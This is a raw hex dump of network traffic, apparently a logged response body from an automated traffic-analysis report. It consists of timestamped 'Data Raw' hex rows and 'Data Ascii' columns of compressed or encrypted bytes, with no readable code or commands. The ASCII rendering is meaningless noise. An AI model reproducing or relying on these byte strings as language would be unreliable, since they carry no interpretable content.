                                                                                                                                                            2022-09-29 12:45:15 UTC23269INData Raw: 8d 5f bb b4 2c 33 59 86 2e 6c e6 03 35 84 09 ed b9 74 c5 ed d4 49 ab 90 af 2c 96 9b 6d 99 ac 45 f5 ae 39 0b b9 28 dd 30 99 2e 45 4f c2 c4 a3 64 77 e7 ab 79 8e 76 8e 13 3f 71 0e 78 2b 18 b5 87 9c f5 1e 5f 52 79 c1 95 a9 86 f9 92 f2 92 48 86 7e 60 b6 cc 7d e0 82 0f 7b 72 6c dd 42 07 65 39 a8 4e c4 db ec a5 d9 5f f7 b6 4e b6 be b7 57 1a a2 24 9c 2a 4e 11 13 48 3b 30 c7 97 09 3e 8d c7 26 3a c8 5c b6 d8 4c f7 db 96 2c f6 1b 88 7e 5b 6a 8b 4a ff 13 56 ba 7e 46 ff b3 53 52 a0 6f da 27 47 76 59 69 91 f8 0d d7 62 47 7f d1 46 57 d4 dd d7 87 32 46 43 fd 6d 94 7c 4b ad a9 1c d0 98 61 3b 47 5a 16 c6 ee d9 88 ae c0 23 25 14 59 97 eb 9a 7b 5f 4e 2a 3d 9f 76 35 94 0b 37 10 2c 7c 4d 2b e4 3d 24 11 37 70 65 7a 6a d0 bf e0 70 87 a7 14 d1 13 5d 99 f6 a6 8e 47 9a ab e0 f5 4f
                                                                                                                                                            Data Ascii: _,3Y.l5tI,mE9(0.EOdwyv?qx+_RyH~`}{rlBe9N_NW$*NH;0>&:\L,~[jJV~FSRo'GvYibGFW2FCm|Ka;GZ#%Y{_N*=v57,|M+=$7pezjp]GO
                                                                                                                                                            2022-09-29 12:45:15 UTC23285INData Raw: 1f 87 5f bf 43 fb eb 6b e2 21 92 86 c7 98 6a 56 13 93 b0 1f 9a 13 9e 0c 8a fa a3 26 99 a9 0a f2 f8 39 0e 2b 81 e2 f9 3c 5f 9a cd 2e ce 9c 45 b5 36 63 c1 7a 0e d9 c3 70 bd 9f 4c b4 59 ad 2c c7 26 20 57 9f 73 56 a6 07 a1 30 a1 47 e8 01 9c 3d d6 89 95 77 20 2a 59 88 b3 cc 7a c5 2a f4 23 4a ae 1c 2c 71 37 62 2a 5f e0 fd bf bf f2 48 8b 73 8d 16 d7 a4 b1 73 7c f9 e5 c6 25 d6 af d8 63 58 42 e9 b2 f3 37 82 77 92 64 18 bd 78 a1 07 16 ab 38 c4 25 27 e8 60 82 89 f6 07 00 30 84 cf da 48 6a 9c 09 81 c9 42 1f 87 9b 05 dd d1 e1 6a 33 72 8e fc ff 8a f3 8d f6 d2 82 01 5a 13 0c 47 b3 94 7d 19 45 1d ba 44 a0 cb df 95 a3 97 3e 48 d0 2c f5 6b 62 fa d2 a0 12 09 b0 0d fe 08 92 05 75 23 3e a3 32 1a 41 78 41 c7 a8 0b 49 cf 7a f4 98 be 8f c7 20 25 f9 df 80 1c 82 41 6b bd 25 04 93
                                                                                                                                                            Data Ascii: _Ck!jV&9+<_.E6czpLY,& WsV0G=w *Yz*#J,q7b*_Hss|%cXB7wdx8%'`0HjBj3rZG}ED>H,kbu#>2AxAIz %Ak%
                                                                                                                                                            2022-09-29 12:45:15 UTC23301INData Raw: 9e aa ec db 19 70 09 36 64 28 af e2 52 5a 83 9c 2f db 66 cd f8 3d ae b1 ef 32 0d 2c 09 06 26 bf 21 ed 38 04 5e 8b a7 b9 e1 73 24 0f 1e 4f 44 f2 55 98 92 7f df c0 e3 6f ba 0a 0d 73 af 66 ee 91 9e fd d0 a4 c2 99 7f 87 37 c6 61 b8 21 15 32 90 7e ca ae 1f ad 13 8d ac d1 7a 69 62 df 0b f5 03 dc 39 c9 74 a8 a1 b4 51 ae f4 c2 31 8b 59 d8 47 fe ac 35 f1 8b ad 2c 55 ac cc 69 c9 8d fe c1 dc 70 00 16 21 2c e8 d8 1f f8 c1 1b d9 79 b3 f6 23 f1 0c d8 74 7c 44 c3 11 33 2f 9f c3 34 b2 4e 01 49 2b 9a 28 99 35 65 c5 4f d0 72 04 12 80 c8 c0 53 27 b1 c9 a8 d8 c7 64 4e 67 ac 33 ba 97 6d bc f6 e6 b0 27 c0 21 d7 5b 1e c5 13 37 a7 ac 6e 2e b3 9e 86 69 88 2c 3f 7c 01 87 af a9 5a d7 77 8e 44 3a 81 50 71 de 6c 94 e3 ae 88 ff 0b 82 66 a4 5f cb 52 b9 39 bf 91 66 f3 f1 f1 89 63 e5 3b
                                                                                                                                                            Data Ascii: p6d(RZ/f=2,&!8^s$ODUosf7a!2~zib9tQ1YG5,Uip!,y#t|D3/4NI+(5eOrS'dNg3m'![7n.i,?|ZwD:Pqlf_R9fc;
                                                                                                                                                            2022-09-29 12:45:15 UTC23317INData Raw: 83 f2 c8 26 d8 24 4e 07 6e e7 06 e8 73 b9 03 9d 81 70 cb f8 b9 26 06 d8 88 82 cc ac f5 6f 0e bd fc fd 5f ba 22 26 95 17 1b 36 d4 82 68 43 21 1d d8 1d aa 6a d2 2b 7c 41 68 8e ac e5 ea 91 b4 18 ce 7f 1d af 78 a9 8c b0 77 28 d4 0b 7f a7 05 7d 0f c5 25 39 9a 87 f4 bc b5 a4 49 3f d8 01 43 48 6d 96 43 48 47 17 ce 74 86 31 59 e4 c0 79 ef 85 f9 70 73 47 9e 9f 04 c4 e4 5e 36 a7 fe 84 6a 7f 11 16 c9 33 a8 f9 bc 84 d4 67 aa 3e 0d 8c 5e 90 9a 21 34 77 92 7a da 46 88 f8 48 25 05 4e 6e d7 62 27 ca 83 5f f1 42 46 51 76 75 bc e9 f7 37 b4 26 e8 4b 1e 55 4c f9 d5 93 2d f8 4d 8e 88 32 3c 9b 62 d3 8a ec cd 42 de e6 58 10 d4 82 dd d7 28 51 f9 ca 67 e0 30 63 b1 8a 05 a8 31 ca ab 7d 63 f7 57 80 a0 16 02 e6 8d 03 20 99 c8 bb ae f0 8b c0 e1 20 bf b7 25 0f db 06 08 b3 ea 5b 8f 97
                                                                                                                                                            Data Ascii: &$Nnsp&o_"&6hC!j+|Ahxw(}%9I?CHmCHGt1YypsG^6j3g>^!4wzFH%Nnb'_BFQvu7&KUL-M2<bBX(Qg0c1}cW %[
                                                                                                                                                            2022-09-29 12:45:15 UTC23333INData Raw: 6a 06 c2 6d 4d 69 d6 1a 2a 7c c1 33 81 a5 0f 46 2f 3e 85 b2 55 ef c4 e8 96 7a 0a de a3 6f 05 4f 69 d0 a7 35 06 12 ea 24 fb 30 ba 2a 26 47 1c c2 73 c2 0f b5 9f fb c0 67 d7 fa aa d1 6d 10 09 de 78 78 2e 3e dd fe 6b f1 27 34 1e d1 b5 04 f9 8f 55 25 c0 5a a2 42 95 21 87 de d7 f7 b8 1d d0 a2 62 bc ce ed 7b f2 cf bc 55 b1 ce ac ff 25 a6 0c b2 31 f5 45 5b 3d 24 eb bd 6c c7 12 45 30 64 c7 45 d5 0d 6e ec 75 5a ba 7d 05 85 e5 98 89 ec 30 75 37 41 6a 0b eb 54 aa 74 f8 5c dc ba 14 4a 5e f1 16 ec e2 c2 6b 78 83 fe 44 21 a8 d0 20 69 4b 54 de 63 42 43 38 07 52 28 3f 5a 3a 8b 1a f1 7f 08 3b 7f 2d 5e 7b cf 3b 2f 7a e1 6c 12 38 62 04 3c 85 bd f1 51 bb 0d 35 8c 3a d7 77 fd b3 b0 9a e5 be 4d a1 07 e7 e6 b3 34 66 99 9e 4e 21 80 72 12 30 a2 2e d7 7f 5c 8f 76 60 89 ae 7d 45 d4
                                                                                                                                                            Data Ascii: jmMi*|3F/>UzoOi5$0*&Gsgmxx.>k'4U%ZB!b{U%1E[=$lE0dEnuZ}0u7AjTt\J^kxD! iKTcBC8R(?Z:;-^{;/zl8b<Q5:wM4fN!r0.\v`}E
                                                                                                                                                            2022-09-29 12:45:15 UTC23349INData Raw: 20 4a 45 7f 48 a5 90 a3 f5 f0 0d 5d 09 15 12 d6 db b3 ec 6f 04 1b 59 3a 25 84 bb 51 9f 79 2b 71 16 f6 48 65 e8 44 4e 94 6c 9b 51 3f fc a3 a1 a1 24 1a ca 6d 87 25 1b 1d 56 b3 e9 9b 77 95 c6 73 b8 96 92 ae 75 00 79 38 40 d9 f2 a2 4d c9 f5 34 a6 ca bc 33 72 20 1a e7 93 81 a2 a9 5a f6 71 74 65 7e 8c 44 4f 76 c5 0d 94 c2 dc 2f db 7c 41 28 b4 83 5d 76 61 90 f7 50 e1 46 3e 14 fc c3 25 b6 32 a2 da 72 e6 d6 81 7d 1d 9d 0c 7d 7e 35 01 53 3d f9 21 11 87 40 33 80 27 b3 24 b8 0d 6a 59 81 49 71 aa 2e 14 d9 ff 76 d1 6d 66 9c f8 9c fa a4 b2 63 f8 fd db 4e 86 6d 12 ba 66 f5 7c d5 90 98 17 b8 72 24 72 e1 79 1c ec 89 a2 b2 1e e3 0e fb 99 81 4a a8 96 57 a9 1f 51 47 d7 71 1b aa 84 1d a4 85 db 43 d2 12 51 7a 41 aa 04 62 e4 ed 90 46 27 7c 9a 32 96 c1 71 da 3a 0e 64 4c 48 15 d5
                                                                                                                                                            Data Ascii: JEH]oY:%Qy+qHeDNlQ?$m%Vwsuy8@M43r Zqte~DOv/|A(]vaPF>%2r}}~5S=!@3'$jYIq.vmfcNmf|r$ryJWQGqCQzAbF'|2q:dLH
                                                                                                                                                            2022-09-29 12:45:15 UTC23365INData Raw: 28 ff a7 4e fc 37 f9 a1 3b 6d d3 c6 a6 af 78 23 99 a9 66 91 16 27 8c 68 55 cc 3b 55 fa c4 ad 24 40 ff af d6 4d 62 47 5f 38 9f d8 4d 16 31 05 08 e4 6e a5 ca dc 6e 31 ae 8f 9e 99 1b c7 81 11 03 9b b5 a2 ba 5a 30 3a e2 61 34 46 31 92 2a e2 10 20 bb 2e 53 bd 48 4d 52 3a 39 2f 53 a4 a0 d2 9e f9 45 86 64 ec 33 38 f1 bb f1 20 81 fe 77 ef d0 d1 2d b3 33 65 7e 7d d9 c3 3c 97 dd f0 0f bd 2c 04 ae 54 ac 28 74 7b a0 15 f8 2c f8 14 87 b4 55 a9 7d ba 96 c4 5b a6 1f 5b f3 ed af 58 4a a1 6c 31 67 1b eb ea 79 95 7d 69 cb eb 86 82 a2 52 ff c3 dd 33 d6 d4 68 41 b7 67 fa 68 12 7d e1 1d 0d 30 8d 18 75 2d bc 6f fc 29 18 1c ce 6d 87 63 69 f5 07 5b f9 b0 a0 cf 17 6f c9 6b 83 00 0d 90 70 25 5b 92 58 ec 20 00 3e 7b f1 82 02 8d 44 ed 72 fb 69 aa 36 fc 7d 74 bd bb 4e 88 8d 44 e5 c6
                                                                                                                                                            Data Ascii: (N7;mx#f'hU;U$@MbG_8M1nn1Z0:a4F1* .SHMR:9/SEd38 w-3e~}<,T(t{,U}[[XJl1gy}iR3hAgh}0u-o)mci[okp%[X >{Dri6}tND
                                                                                                                                                            2022-09-29 12:45:15 UTC23381INData Raw: 59 7b b5 d1 ea 36 00 26 64 eb 82 1a 81 0d 2f cc d7 3f c2 32 38 ba 8e 51 03 2e b7 1c d6 e3 16 c1 a9 ed bc bb 2c f4 a5 71 74 d4 68 e0 2e 90 ed 0c 35 b5 f3 0e 63 51 cf a1 6b cf 7e 46 b7 e4 7c 5d 03 24 89 36 fa 5a 97 e4 30 82 d8 ad 8d 0a 65 c2 7c a9 9e 8b f1 43 a7 cc b1 4d 84 74 23 92 32 7d 29 5e 64 31 ee c2 9c 01 12 03 18 bc a6 b8 c6 f4 4f 2c 7b 4b d7 bc c6 34 e6 8f d2 77 d5 8d c2 d5 34 c2 87 d3 bf 1c c5 e1 af 08 87 d9 80 2e 83 31 49 1b d2 75 dd db c2 55 d7 83 64 e0 b4 21 b5 07 5e 83 6a 12 39 18 84 20 15 c7 a0 41 29 a1 db 97 92 de 73 d3 39 89 80 b9 5f 40 e9 7b d1 fa 3a e3 aa 7d af 3f 5c be a3 2d 76 77 71 19 3f 42 ae 8f 40 ac 97 91 5d 22 99 03 a5 25 65 c4 27 4e 14 1a 04 de 62 bd ab fa 29 65 86 24 f2 51 2d dc 21 48 8a 43 f5 c3 1d 94 d2 5a 2c 29 50 8b 9d 01 0a
                                                                                                                                                            Data Ascii: Y{6&d/?28Q.,qth.5cQk~F|]$6Z0e|CMt#2})^d1O,{K4w4.1IuUd!^j9 A)s9_@{:}?\-vwq?B@]"%e'Nb)e$Q-!HCZ,)P
                                                                                                                                                            2022-09-29 12:45:15 UTC23397INData Raw: 3b da e8 f1 77 13 ad 4f a4 d5 0f 48 ce c6 b0 63 3a bb 83 af e2 46 cb df ae f0 3a f1 75 92 38 06 d3 1a 91 93 3d b6 32 7f 3a b9 1f c6 5e 1d ee c1 2f c2 22 53 de 30 9e a7 a5 4a 8c c4 ee 3c 2d 40 69 12 71 42 1f 29 20 ce bf 6d 73 cb e5 3b c0 7e 4b 1d 66 e0 6d 3b d7 f9 3b 2b e0 96 7c a0 1c 40 e8 92 e3 54 59 07 12 8f e8 43 cb 64 93 76 a0 91 12 22 a2 81 d1 4b 33 3a d7 20 6f 41 38 0a 9a 15 08 e3 3c 04 93 e3 de 54 31 15 9c c0 40 b6 cd 01 4a b2 49 e2 02 04 b5 e6 e4 e2 f3 29 f2 47 8a db 57 d2 13 b8 a3 fe 25 56 b6 93 21 1d e7 70 0a 23 5b 5e 0b 0c 22 dd f5 6c 42 ea fa 65 7e d4 a6 a8 4d 1e 6c 03 55 2c 96 0e b3 81 96 bf 92 88 ee f4 79 39 1d 3a e1 f8 0e 2a 19 22 22 44 95 20 f9 93 55 bd 13 bb c2 4b 31 b6 18 28 9e a0 25 cd 07 19 ad b5 b1 86 1a f1 9e df 90 62 c5 19 f9 7f 2d
                                                                                                                                                            Data Ascii: ;wOHc:F:u8=2:^/"S0J<-@iqB) ms;~Kfm;;+|@TYCdv"K3: oA8<T1@JI)GW%V!p#[^"lBe~MlU,y9:*""D UK1(%b-
                                                                                                                                                            2022-09-29 12:45:15 UTC23413INData Raw: 4f e8 53 c6 ec cf 55 54 c8 b4 4b b3 ee 77 7d a7 62 55 f1 0c f8 73 f5 b0 01 68 89 4f 38 ee 20 6b 9c 85 84 72 f8 87 79 0a 14 a9 a5 00 d7 9e cf 0b 0b b1 6a 17 96 63 f1 87 ad bb 39 6a 8a 72 3e 73 df 8d f3 c3 bc 9c e4 e2 89 62 b8 e8 c5 a9 1a 39 43 cb ee 4b 05 8a f1 4b cf f8 a2 71 ad 4f e0 76 c3 eb b7 40 7c 9e 36 7b 34 38 4d d8 ee 2f 23 d3 34 68 61 d3 93 10 b9 b3 dd b5 bd ad 5b 94 e8 83 10 27 c1 c1 0b 12 08 1a 6f a1 37 5c eb 0b 89 8d 07 10 92 5d 78 f7 ce a7 da 00 79 aa 8d 8d 11 86 17 80 1a b2 73 db 78 62 bf 4f 5b 51 c1 53 a2 a0 85 9e a2 0a a0 c3 68 d6 e3 55 b3 41 7d ca 1f 9b 2c 52 6a 75 22 06 ec fb 4e 38 cb 82 a4 4b 40 a7 57 66 60 d0 ef f4 12 54 6e ef cc d0 e6 4f 0f 67 26 8d 64 89 f4 ff 58 32 c3 b1 ac e1 91 9b ad 01 1b 3d e9 3a fa ac b6 0d e1 24 c9 bf 15 4d c1
                                                                                                                                                            Data Ascii: OSUTKw}bUshO8 kryjc9jr>sb9CKKqOv@|6{48M/#4ha['o7\]xysxbO[QShUA},Rju"N8K@Wf`TnOg&dX2=:$M
                                                                                                                                                            2022-09-29 12:45:15 UTC23429INData Raw: 13 aa a7 3d ef 1c 04 34 7d 9f 18 1e 8b 5a 82 f5 7d 12 68 01 26 55 0f b6 66 fb 92 27 26 73 fc 58 b1 77 3d 33 13 be 96 65 dd c2 84 3b 28 cb ff ce bd 86 e6 83 09 0e 7d 2c 4d 93 24 04 e3 60 d1 01 e6 7b 86 c8 4a 97 eb d1 ee 42 cc fd e1 91 dd 8d a1 1f fb 99 39 b7 e1 1c 5e a6 21 1b 02 f5 5a 31 a1 53 54 d8 43 91 9d e9 1d da 52 d1 e8 27 35 9e 3c ae f3 c5 dc 0e d8 12 5a 7d 0c 87 ff f9 9d 4c 42 0f 52 e2 41 c1 34 38 93 fa 69 72 f9 71 23 bd b4 4e a7 9d 02 88 63 01 ec c4 c4 87 04 2b 30 36 f3 6f d2 a9 a1 23 b0 1f ac ea 8c 42 b2 f4 e6 9b d4 00 8a b4 4d 39 80 cb 1d 20 f9 84 de 39 fd 40 e1 d9 58 6b e5 45 44 25 fe 84 3f d9 fd f2 de c0 51 27 be 2b 6b d0 be 5a e1 b5 59 6b c7 c5 59 0f 89 63 5b ec 0c c9 ee df 78 77 ba a1 08 01 19 38 65 52 a9 9e ed 01 76 50 cc d3 91 3d 8d ba 45
                                                                                                                                                            Data Ascii: =4}Z}h&Uf'&sXw=3e;(},M$`{JB9^!Z1STCR'5<Z}LBRA48irq#Nc+06o#BM9 9@XkED%?Q'+kZYkYc[xw8eRvP=E
                                                                                                                                                            2022-09-29 12:45:15 UTC23445INData Raw: c4 0e a7 ec 3b c9 06 b6 71 d6 70 25 8f 5e 1b 8f bc 27 9b 79 e4 94 f4 88 42 40 dd c1 7d 7f 3d 5f e3 30 ca dc d5 a9 26 8d e1 8a 08 ad 54 c8 80 06 4b 8f ee 98 8e 4e 60 bc ac 3d ce 86 7b c6 10 54 c0 59 2c 6c 6e d3 ff b5 25 c3 95 9e 7d d5 07 0d 53 64 6d 3d a4 47 01 20 1a f9 ac 56 3a 45 69 1c db ec 8d 2c d1 07 cb 62 ad c5 bd 3e 10 d2 8a a5 eb 55 c3 ee 28 2f 9b 42 4d 54 88 a9 60 be 70 20 73 e2 cc 9c 13 17 7f f2 c3 3f f3 34 36 26 48 f0 60 02 22 8e e0 87 6a e3 41 2f de ab c1 9c 94 40 0f 36 13 94 a3 94 34 b2 2f 7b ce 42 bd 92 a8 e9 12 e0 c2 c4 d5 a9 2d fa a6 6c a1 5c b3 7b 20 62 cb ba 8f cc bc 95 72 cc b2 8d 50 61 02 60 8a b9 b1 82 54 48 92 2b 1d 0a 1c 66 79 3f 3f 0c 4e de 1f 92 57 92 34 91 f4 aa e1 9f 16 0b 4d 3e 18 7e 92 c3 d5 62 0d fd 12 bb 2b 18 eb f2 06 a9 28
                                                                                                                                                            Data Ascii: ;qp%^'yB@}=_0&TKN`={TY,ln%}Sdm=G V:Ei,b>U(/BMT`p s?46&H`"jA/@64/{B-l\{ brPa`TH+fy??NW4M>~b+(
                                                                                                                                                            2022-09-29 12:45:15 UTC23461INData Raw: 43 66 ec a4 60 c3 2c f7 df 68 83 e2 27 70 24 d2 de 87 c3 37 12 6b 58 29 25 5a b0 ab 89 5a ad 1c 18 e1 b9 4d 79 c9 92 f8 bf 10 22 09 7e f3 43 a0 05 f1 3d a9 4f 3b f3 bd 7b 2b 82 60 5d 2c c4 d6 2f ae 58 e1 9c 6b 7c 17 33 c0 07 8c c5 ad 09 50 dc c3 bf 29 f8 b8 7e 51 0d 71 6b 03 f4 62 20 04 e2 4b 62 a3 cc 34 50 d0 c1 bd 29 85 45 7b 66 3e 01 f0 70 c2 4c 4d 9b a2 b7 b4 2c 90 36 8e c2 62 65 99 22 b3 08 9b 8a 84 97 04 4f 6b 30 20 5b 79 1e 76 18 03 10 b1 ec 21 69 ce dc 12 71 c0 a3 9e 05 28 85 69 e6 4e 9d 09 80 43 ce 98 54 77 e5 5f ff 9e 70 54 66 68 df 72 a1 15 c6 2b 53 f1 65 90 90 cb fe 5f 58 87 ef f3 5f 6e 1e 8b f7 d0 fc 51 34 a5 19 ee cb d2 65 73 e8 87 ef 0a 22 e8 22 54 70 48 70 a4 bf 8d 2a 0d 68 38 76 26 4d 99 2b 60 7f 45 85 a5 e7 9f c9 90 32 28 6a 2f 86 fd c7
                                                                                                                                                            Data Ascii: Cf`,h'p$7kX)%ZZMy"~C=O;{+`],/Xk|3P)~Qqkb Kb4P)E{f>pLM,6be"Ok0 [yv!iq(iNCTw_pTfhr+Se_X_nQ4es""TpHp*h8v&M+`E2(j/
                                                                                                                                                            2022-09-29 12:45:15 UTC23477INData Raw: cb df 8b a5 dd f7 3c e0 96 39 e9 31 de f4 73 16 3b ff fa 8b 57 a8 22 54 b0 8e 1b 01 ce 35 f1 d5 be c1 a6 bf 2d 6a 43 46 34 c8 8d da 2c 05 0e 18 f8 1f bb 02 45 e5 c7 5c 9e b1 c8 c0 75 47 55 7c 84 89 f0 0f 0e 1c 7b b4 b4 81 59 fe fc da ba 59 fd a6 44 8c 29 0b d2 90 a0 73 ad cb 9e 29 06 a1 21 92 69 91 db 06 5b 11 77 ea 35 59 62 5a b4 d3 18 4a 93 24 f8 1e 80 7b 15 d2 51 c8 67 57 69 39 af 41 cd 80 4d 9f df a5 af fe 01 19 29 1c d9 41 27 42 d5 f2 a2 f2 fc 59 05 fc 72 74 3b 16 e7 97 04 66 28 ed 6c e6 02 fc 9c 7c 8b fc e8 9a 16 7a db fb 24 4d 0d 7a 95 a5 ce 24 7f fd 87 21 95 c5 ee cb ae c7 d1 9b 22 0f 89 61 b9 97 eb 6d 7b 85 83 4c 14 74 65 73 e4 0b 04 25 64 99 22 c9 ba 54 7f b6 42 e3 cc 05 14 72 ee ba de 82 c8 32 c1 9f b7 0e cf 56 2d 96 72 0c 52 26 34 92 cd c9 df
                                                                                                                                                            Data Ascii: <91s;W"T5-jCF4,E\uGU|{YYD)s)!i[w5YbZJ${QgWi9AM)A'BYrt;f(l|z$Mz$!"am{Ltes%d"TBr2V-rR&4
                                                                                                                                                            2022-09-29 12:45:15 UTC23493INData Raw: bf dc ac 09 2b d9 f4 f1 d6 2b 2e 19 06 12 97 c9 94 d7 85 13 29 1b db 34 18 0b 86 24 39 8d 39 ac 7a a3 a5 6a 27 45 db fc 28 ea ff 96 25 da 99 7c 60 6b 95 06 a4 65 7f 2d 81 ba 87 90 74 40 73 c6 ba 82 dd 75 2a 6a 80 6c 28 91 46 54 a3 79 31 ce 38 30 c8 7a 7f b7 d6 c2 e2 59 4d 01 2a 1f 78 25 0d 1d 5d b0 c5 f5 e7 87 ab cd ea 66 4f 7b 77 e5 dd 8b 62 6a 1d c1 f6 ee ae c0 1f f5 b4 5d 94 8c 3c 08 56 a4 7a 4b 45 a9 35 00 22 01 0f 6d 97 b5 b5 6e 19 62 fd 29 67 39 cb 0e f3 28 57 2b c2 5f 61 91 11 9c 65 8f d2 c9 0a 35 a1 24 cf 73 66 8a dd ba 30 9a 30 e2 52 7f 2e 81 09 a5 69 12 c9 48 21 6b c4 38 46 f8 99 29 c7 fd fe 9a 31 1c 4c fd a9 44 b0 02 81 7a cc 72 e7 03 0a 8b f1 be 8e d8 0a 13 5f 22 8b 52 e0 d1 6a a5 63 b5 01 f2 64 ae 3e dd 0d 9f e1 37 5b a9 07 5b 92 19 09 4e 20
                                                                                                                                                            Data Ascii: ++.)4$99zj'E(%|`ke-t@su*jl(FTy180zYM*x%]fO{wbj]<VzKE5"mnb)g9(W+_ae5$sf00R.iH!k8F)1LDzr_"Rjcd>7[[N
                                                                                                                                                            2022-09-29 12:45:15 UTC23509INData Raw: f0 99 0d 63 f3 15 50 35 68 90 ad 90 a1 a8 ab a4 93 24 31 a5 f1 5e aa e6 08 8e 46 13 1c 48 2f 03 45 67 3e 6a ff 49 1b a2 5f eb 67 3a cf 9e 38 a9 65 7a e9 a0 ee cd 40 89 82 2d 36 b8 d9 84 44 a4 f5 02 84 96 1e 3a 55 84 21 9c 5a 54 91 2d 4b e1 a2 87 e3 e1 57 82 3d 80 d1 c4 a5 1c c9 c3 4c d5 8f ab c1 01 e3 6b d8 37 ec 90 d2 db f5 83 83 79 0d 31 bd 54 59 43 9a 99 de 98 4b 66 2c c1 10 2f 69 4c 05 1a 55 ff 4f 3e 5d 43 49 76 f8 79 48 87 9b 30 cf 47 4b cc ab 5d f8 92 33 60 39 39 96 47 15 8a 12 46 3c 74 2d 87 bb 40 48 d1 fd 1f ce 0d 07 61 77 28 8a c3 8e 65 2d f8 d0 ba ee cd b8 e0 ef 98 59 2f c7 0f 75 e8 2c 88 b6 e1 2f 53 a7 22 bc ed 77 0a 11 4c 73 49 02 db b4 8b 3a 8c 08 e1 0c 48 f3 38 20 a2 2c 75 80 34 a0 11 e2 0b 54 b9 3f 2c 12 14 90 6f ed b5 1c 21 63 70 5a 52 82
                                                                                                                                                            Data Ascii: cP5h$1^FH/Eg>jI_g:8ez@-6D:U!ZT-KW=Lk7y1TYCKf,/iLUO>]CIvyH0GK]3`99GF<t-@Haw(e-Y/u,/S"wLsI:H8 ,u4T?,o!cpZR
                                                                                                                                                            2022-09-29 12:45:15 UTC23525INData Raw: cb cf fc 5c 98 7d 09 be 1a 17 e4 e1 b3 5f 40 ee 02 09 7c c1 5f 76 7e f9 67 77 15 ca e1 c0 94 bf b6 e7 fe 4b 16 9e b5 5f f0 40 57 04 96 02 34 d3 e4 f9 85 e4 9f 51 e0 4e 5e 15 a6 a7 f2 ec 72 ee 94 e4 4c 0e 12 5a 3d ee f8 f9 3b 38 7b 0b e2 a9 c7 9c 05 9b 21 4c 5b f6 df db 45 2d 8e 8f fc 6c 6c 7d f2 de 06 06 5b a5 07 88 df 80 6d e9 4b c3 4a 63 08 fa d3 23 9d 53 df 04 dd e0 02 19 47 94 f1 cb df a7 e8 00 46 3c 32 6e df 62 2d 6e ff db e0 ec 49 ff ef a0 c6 a3 9a b1 aa ab 77 33 8e b8 3a 39 8e 6f c0 53 45 1c 6f 13 ff ce b9 63 4d 02 d0 84 7c 0c bb b0 fd 2c 5b 3c b2 e6 ca e5 1f 21 ad 95 4f 55 a0 33 e0 dc c9 98 fc 7d 8b cd 52 85 52 81 67 26 22 a8 6e 3d 27 23 ad 89 66 44 6a 31 28 87 7c 78 1e c5 d8 be d3 42 16 72 80 f1 9d 07 16 4f 77 8c e0 74 1d a3 cb 7e 3f 6e f0 46 cb
                                                                                                                                                            Data Ascii: \}_@|_v~gwK_@W4QN^rLZ=;8{!L[E-ll}[mKJc#SGF<2nb-nIw3:9oSEocM|,[<!OU3}RRg&"n='#fDj1(|xBrOwt~?nF
                                                                                                                                                            2022-09-29 12:45:15 UTC23541INData Raw: fb 9d e3 04 50 41 8d 04 88 14 ef 10 81 e3 ce b0 76 f3 43 19 7e c4 b0 19 a1 84 71 e0 b5 3f 7c 3b 47 cc 33 ff b3 9b ac e9 4d 5f e6 77 48 65 e6 3d f3 86 8d 50 fb 62 57 1d 82 7a 3b 0f c0 eb 59 02 4a 33 c3 44 fc 39 6f 94 d3 b8 d3 ee c4 9b b4 de c2 9f ca a4 c3 d8 9d fc c2 79 e5 4f 84 fb b6 3d e6 96 48 ba ea fe c2 1d 23 ed f6 2d a5 fa d8 7f df 0b 85 5a 84 8e 37 96 57 75 59 64 26 4c 00 42 b1 da b9 db fa 55 ae be 67 65 81 39 6e 0f c3 ad 24 10 51 b6 c3 87 d7 ca f7 b5 b2 44 51 cd c1 13 7b 7d 57 ee 6b 1c dd de 59 5c 22 67 f8 8a b6 74 92 e6 59 60 62 71 20 0e b0 bb cd 02 0b 48 e7 75 82 c6 92 f4 86 ae b3 e4 e5 8d 23 e6 b2 08 6f c3 9a 5e 91 86 fb 2a 34 f6 70 af cb c7 10 45 5e dd e0 88 1d 4b 2b ff 3c ad 79 32 81 76 81 bd 3d 1c e6 63 3c 99 23 04 f8 ac d9 6b 5d 4b 5a 17 af
                                                                                                                                                            Data Ascii: PAvC~q?|;G3M_wHe=PbWz;YJ3D9oyO=H#-Z7WuYd&LBUge9n$QDQ{}WkY\"gtY`bq Hu#o^*4pE^K+<y2v=c<#k]KZ
                                                                                                                                                            2022-09-29 12:45:15 UTC23557INData Raw: 6c 44 ad fa 28 66 29 cc d9 75 00 f6 5e 64 fe 75 6b e0 3f 0a fe bb fb 3f 35 60 30 e4 bd 44 0d 03 6b 13 7e 4a b2 09 b4 ee 67 07 25 3b 99 00 a0 1e 81 a1 8c 5e 46 3a e8 b0 59 a8 91 2a f7 2c 97 d4 bf 0a b2 84 fb 47 83 41 4b 10 a2 92 28 82 87 f3 e2 29 f6 94 be 28 86 d2 77 09 ec 65 28 1a 7e 6e 61 3c 60 78 12 87 a7 4f 64 97 bb 81 d6 40 47 f0 ba 12 f4 29 32 fe 54 cd 64 5a 30 10 c1 b5 99 c0 0c ca 96 41 0b 45 cc 8b 25 97 c4 7d 14 d4 eb 4b 3c 3d 38 c3 00 aa af 4a f9 4a 72 ba 27 7f d8 7b 9a 5b 79 9b 28 dd c6 c4 41 dd 58 3e 2f 90 8e ba d5 27 e0 6a a6 39 87 f1 87 88 e8 2d 76 e4 b3 d6 d0 aa 54 1b 62 8f c2 e6 b5 e5 2a 25 6d 10 e0 f8 22 4f 83 e4 ea 9a e0 50 57 49 33 d4 b2 60 11 d0 9e 4a 29 01 17 d6 ef ba fc eb e3 ef 1e 77 23 cf 6d 9e ad e8 c4 a4 37 91 2a 44 0a a4 ce ee d4
                                                                                                                                                            Data Ascii: lD(f)u^duk??5`0Dk~Jg%;^F:Y*,GAK()(we(~na<`xOd@G)2TdZ0AE%}K<=8JJr'{[y(AX>/'j9-vTb*%m"OPWI3`J)w#m7*D
